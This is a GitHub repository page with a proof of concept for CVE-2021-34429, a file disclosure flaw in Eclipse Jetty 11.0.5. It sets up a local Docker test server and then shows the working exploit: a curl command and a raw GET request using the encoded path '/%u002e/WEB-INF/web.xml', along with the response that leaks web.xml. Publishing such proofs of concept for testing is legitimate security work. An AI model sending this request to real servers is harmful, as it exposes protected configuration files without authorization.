Skip to content

ColdFusionX/CVE-2021-34429

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-34429

POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure

Using Encoded URIs to access files inside WEB-INF directory

Setting up the testing Environment

Prequistics: Installing docker and docker-compose on your system

For debain based distros ex. Ubuntu, Kali Linux etc. use the following commands

apt install docker.io
apt install docker-compose

For Windows,mac and other distros please refer the following guides:

Installing Eclipse Jetty 11.0.5

  • Clone or download the repository
  • run docker-compose up -d
  • Your webserver should be up & running on http://localhost:8080/

home

Vulnerablitiy Test

Make a GET request to http://localhost:8080/%u002e/WEB-INF/web.xml

  • curl -v 'localhost:8080/%u002e/WEB-INF/web.xml'

Request

GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>

References:

About

POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 Sensitive File Disclosure

Topics

Resources

License

Stars

Watchers

Forks

Languages